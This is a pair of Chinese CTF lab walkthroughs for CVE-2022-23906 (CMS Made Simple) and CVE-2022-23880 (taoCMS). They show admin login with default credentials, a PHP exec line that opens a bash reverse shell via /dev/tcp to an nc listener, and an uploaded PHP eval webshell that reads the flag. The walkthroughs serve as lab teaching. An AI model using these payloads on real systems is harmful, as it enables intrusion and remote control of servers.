【春秋云境】CVE-2022-23906靶场WP
网站地址:https://yunjing.ichunqiu.com/
渗透测试
1.已知提示
- CMS Made Simple v2.2.15 被发现包含通过上传图片功能的远程命令执行 (RCE) 漏洞。此漏洞通过精心制作的图像文件被利用。
2.开启靶场
3.登陆后台
-
后台地址/admin/login.php,账号admin,密码123456
4.找到存在漏洞的位置
-
扩展–>用户定义标签–>新增自定义标签
5.构造exp
-
填写名称为glc,添加以下代码
exec("/bin/bash -c 'bash -i > /dev/tcp/ip/port 0>&1'");
6.反弹shell
-
在云服务器上安装nc
yum install -y nc
-
开启监听端口1234,记得提前把服务器的防火墙规则修改一下
nc -lnvp 1234
-
点击run,运行构造的代码,成功反弹shell。然后执行cat /flag
成功获得flag
【春秋云境】CVE-2022-23880靶场WP
网站地址:https://yunjing.ichunqiu.com/
渗透测试
1.已知提示
- taoCMS v3.0.2 文件管理处存在任意文件上传漏洞,攻击者可执行任意代码
2.开启靶场
3.登陆后台
-
后台路径/admin,账号admin:密码tao
4.上传文件
-
点击文件管理,新建一个名为glc.php的文件,然后点击编辑,放入以下代码,点击保存
<?php @ eval($_GET["cmd"]) ?>
5.执行命令
-
访问/glc.php,发现是个空白页面,证明上传成功。咱们构造构造url从而执行命令,获得flag
/glc.php?cmd=system(%27cat%20/flag%27);